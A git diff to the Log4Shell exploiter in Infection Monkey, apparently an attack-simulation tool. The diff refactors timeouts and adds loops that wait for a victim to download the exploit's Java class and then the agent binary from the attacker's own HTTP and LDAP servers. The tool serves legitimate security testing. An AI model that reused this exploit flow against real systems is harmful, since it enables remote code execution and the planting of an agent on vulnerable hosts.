diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py index ed2290279..bd0e468f9 100644 --- a/monkey/infection_monkey/exploit/log4shell.py +++ b/monkey/infection_monkey/exploit/log4shell.py @@ -1,5 +1,5 @@ import logging -from time import sleep +import time from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.log4shell_utils import ( @@ -13,6 +13,7 @@ from infection_monkey.exploit.log4shell_utils import ( from infection_monkey.exploit.tools.helpers import get_monkey_depth from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.web_rce import WebRCE +from infection_monkey.model import DOWNLOAD_TIMEOUT as AGENT_DOWNLOAD_TIMEOUT from infection_monkey.model import ( DROPPER_ARG, LOG4SHELL_LINUX_COMMAND, @@ -31,8 +32,10 @@ class Log4ShellExploiter(WebRCE): _TARGET_OS_TYPE = ["linux", "windows"] EXPLOIT_TYPE = ExploitType.VULNERABILITY _EXPLOITED_SERVICE = "Log4j" - DOWNLOAD_TIMEOUT = 15 - REQUEST_TO_VICTIM_TIME = 5 # Max time agent will wait for the response from victim in SECONDS + SERVER_SHUTDOWN_TIMEOUT = 15 + REQUEST_TO_VICTIM_TIMEOUT = ( + 5 # Max time agent will wait for the response from victim in SECONDS + ) def __init__(self, host: VictimHost): super().__init__(host) @@ -101,11 +104,11 @@ class Log4ShellExploiter(WebRCE): def _stop_servers(self): logger.debug("Stopping all LDAP and HTTP Servers") - self._agent_http_server_thread.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT) + self._agent_http_server_thread.stop(Log4ShellExploiter.SERVER_SHUTDOWN_TIMEOUT) - self._exploit_class_http_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT) + self._exploit_class_http_server.stop(Log4ShellExploiter.SERVER_SHUTDOWN_TIMEOUT) - self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT) + self._ldap_server.stop(Log4ShellExploiter.SERVER_SHUTDOWN_TIMEOUT) def _build_ldap_payload(self) -> str: interface_ip = get_interface_to_target(self.host.ip_addr) @@ -147,13 +150,46 @@ class Log4ShellExploiter(WebRCE): f"potential {exploit.service_name} service: {ex}" ) - # Wait for request - sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME) - - if self._exploit_class_http_server.exploit_class_downloaded(): + if self._wait_for_victim(): self.exploit_info["vulnerable_service"] = { "service_name": exploit.service_name, "port": port, } return True + return False + + def _wait_for_victim(self) -> bool: + victim_called_back = False + + victim_called_back = self._wait_for_victim_to_download_java_bytecode() + if victim_called_back: + self._wait_for_victim_to_download_agent() + + return victim_called_back + + def _wait_for_victim_to_download_java_bytecode(self) -> bool: + start_time = time.time() + + while not self._victim_timeout_expired( + start_time, Log4ShellExploiter.REQUEST_TO_VICTIM_TIMEOUT + ): + if self._exploit_class_http_server.exploit_class_downloaded(): + return True + + time.sleep(1) + + return False + + def _wait_for_victim_to_download_agent(self): + start_time = time.time() + + while not self._victim_timeout_expired(start_time, AGENT_DOWNLOAD_TIMEOUT): + if self._agent_http_server_thread.downloads > 0: + break + + time.sleep(1) + + @classmethod + def _victim_timeout_expired(cls, start_time: float, timeout: int) -> bool: + return timeout < (time.time() - start_time)